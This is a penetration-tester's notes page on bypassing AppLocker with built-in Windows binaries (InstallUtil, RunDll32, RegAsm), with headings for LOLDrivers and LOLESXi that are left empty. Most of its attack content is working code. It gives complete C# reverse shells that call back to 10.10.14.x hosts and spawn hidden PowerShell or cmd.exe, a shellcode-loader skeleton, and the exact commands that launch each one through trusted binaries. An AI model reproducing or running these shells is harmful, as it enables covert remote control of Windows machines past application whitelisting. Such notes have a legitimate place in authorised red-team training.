LOLBAS / LOLDrivers / LOLESXi

LOLBAS

InstallUtil

PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

FilePath                                                      PolicyDecision MatchingRule
--------                                                      -------------- ------------
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe        Allowed (Default Rule) All files located in the Windows folder

Visual Studio - Project > Add Reference... menu

Browse... and select

C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll

using System;
using System.Configuration.Install;

public class NotMalware_IU
{
    public static void Main(string[] args)
    {
    }
}

[System.ComponentModel.RunInstaller(true)]
public class A : System.Configuration.Install.Installer
{

    [DllImport("kernel32")]
    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
    
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // Shellcode (micr0_shell)
        string bufEnc = "<SNIP>";

        // Decrypt shellcode
        <SNIP>
    }
}

Exploit:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Tools\NotMalware_IU\NotMalware_IU\bin\x64\Release\NotMalware_IU.exe

RunDll32

PS C:\Users\max> Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path C:\Windows\System32\rundll32.exe

FilePath                         PolicyDecision MatchingRule
--------                         -------------- ------------
C:\Windows\System32\rundll32.exe        Allowed (Default Rule) All files located in the Windows folder

Class Library (.NET Framework)

Project > Manage NuGet Packages...

Settings (gear) icon

Uncheck the first two checkboxes

Select package source and select DllExport. Next, click Install and then Apply

Mark Installed checkbox, and then click Apply

Reload All.

using System;
using System.IO;
using System.Net.Sockets;
using System.Diagnostics;
using rundll;

namespace RShell
{
    internal class Program
    {
        private static StreamWriter streamWriter; // Needs to be global so that HandleDataReceived() can access it

        [DllExport("DllMain")]
        public static void DllMain()
        {
            try
            {
                // Connect to <IP> on <Port>/TCP
                TcpClient client = new TcpClient();
                client.Connect("10.10.14.133", 1010);

                // Set up input/output streams
                Stream stream = client.GetStream();
                StreamReader streamReader = new StreamReader(stream);
                streamWriter = new StreamWriter(stream);

                // Define a hidden PowerShell (-ep bypass -nologo) process with STDOUT/ERR/IN all redirected
                Process p = new Process();
                p.StartInfo.FileName = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"; //32-bit version
                p.StartInfo.Arguments = "-ep bypass -nologo";
                p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
                p.StartInfo.UseShellExecute = false;
                p.StartInfo.RedirectStandardOutput = true;
                p.StartInfo.RedirectStandardError = true;
                p.StartInfo.RedirectStandardInput = true;
                p.OutputDataReceived += new DataReceivedEventHandler(HandleDataReceived);
                p.ErrorDataReceived += new DataReceivedEventHandler(HandleDataReceived);

                // Start process and begin reading output
                p.Start();
                p.BeginOutputReadLine();
                p.BeginErrorReadLine();

                // Re-route user-input to STDIN of the PowerShell process
                // If we see the user sent "exit", we can stop
                string userInput = "";
                while (!userInput.Equals("exit"))
                {
                    userInput = streamReader.ReadLine();
                    p.StandardInput.WriteLine(userInput);
                }

                // Wait for PowerShell to exit (based on user-inputted exit), and close the process
                p.WaitForExit();
                client.Close();
            }
            catch (Exception) { }
        }

        private static void HandleDataReceived(object sender, DataReceivedEventArgs e)
        {
            if (e.Data != null)
            {
                streamWriter.WriteLine(e.Data);
                streamWriter.Flush();
            }
        }
    }
}

Build: Release - Any CPU (because powershell 32-bit version used)

Exploitation:

C:\Windows\System32\RunDll32.exe C:\Tools\rundll\rundll\bin\Release\x86\rundll.dll,DllMain

Tool - ExecIT

Wevtutil.exe

Regasm - Bypass AppLocker to RShell

Generate a private and a public key pair and these values will be written into a file called key.snk

C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools>sn.exe -k key.snk

Microsoft (R) .NET Framework Strong Name Utility  Version 4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

Key pair written to key.snk

PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> $Content = [System.Convert]::FromBase64String($key)
PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> Set-Content key.snk -Value $Content -Encoding Byte

Projet visual studio Class Library (.NET Framework) - Project Name RegasmDLL

Change class1.cs to Regasm.cs

using System;
using System.EnterpriseServices;
using System.IO;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;

namespace regsvcser
{
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }

        [ComRegisterFunction] // This executes if registration is successful
        public static void RegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute");
            Shellcode.Exec();
        }

        [ComUnregisterFunction] // This executes if registration fails
        public static void UnRegisterClass(string key)
        {
            Console.WriteLine("I shouldn't really execute either.");
            Shellcode.Exec();
        }
    }

    public class Shellcode
    {
        public static void Exec()
        {
            string serverIp = "10.10.14.166"; // Replace with the attacker's IP
            int serverPort = 8080; // Replace with the attacker's port

            try
            {
                using (TcpClient client = new TcpClient(serverIp, serverPort))
                using (NetworkStream stream = client.GetStream())
                using (StreamReader reader = new StreamReader(stream))
                using (StreamWriter writer = new StreamWriter(stream) { AutoFlush = true })
                {
                    Console.WriteLine("Connected to server");

                    while (true)
                    {
                        // Read command from server
                        string command = reader.ReadLine();
                        if (command == null || command.ToLower() == "exit")
                            break;

                        // Execute command
                        try
                        {
                            var process = new System.Diagnostics.Process
                            {
                                StartInfo = new System.Diagnostics.ProcessStartInfo
                                {
                                    FileName = "cmd.exe",
                                    Arguments = "/c " + command,
                                    RedirectStandardOutput = true,
                                    RedirectStandardError = true,
                                    UseShellExecute = false,
                                    CreateNoWindow = true
                                }
                            };

                            process.Start();
                            string output = process.StandardOutput.ReadToEnd();
                            string error = process.StandardError.ReadToEnd();
                            process.WaitForExit();

                            writer.WriteLine(output);
                            writer.WriteLine(error);
                        }
                        catch (Exception ex)
                        {
                            writer.WriteLine("Error: " + ex.Message);
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error: " + ex.Message);
            }
        }
    }
}

Compile

PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /target:library /out:C:\Tools\RegasmDLL\Regasm.dll /keyfile:key.snk C:\Tools\RegasmDLL\RegasmDLL\Regasm.cs
Microsoft (R) Visual C# Compiler version 4.8.4161.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

Exploit

PS C:\Windows\Microsoft.NET\Framework64\v4.0.30319> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe /U C:\Tools\RegasmDLL\Regasm.dll
Microsoft .NET Framework Assembly Registration Utility version 4.8.4161.0
for Microsoft .NET Framework version 4.8.4161.0
Copyright (C) Microsoft Corporation.  All rights reserved.

I shouldn't really execute either.
Connected to server

LOLDrivers

Living off the land drivers

LOLESXi

Living Off The Land ESXi

PreviousAppLocker NextPowerShell ConstrainedLanguage Mode, CLM

Last updated 2 months ago

Was this helpful?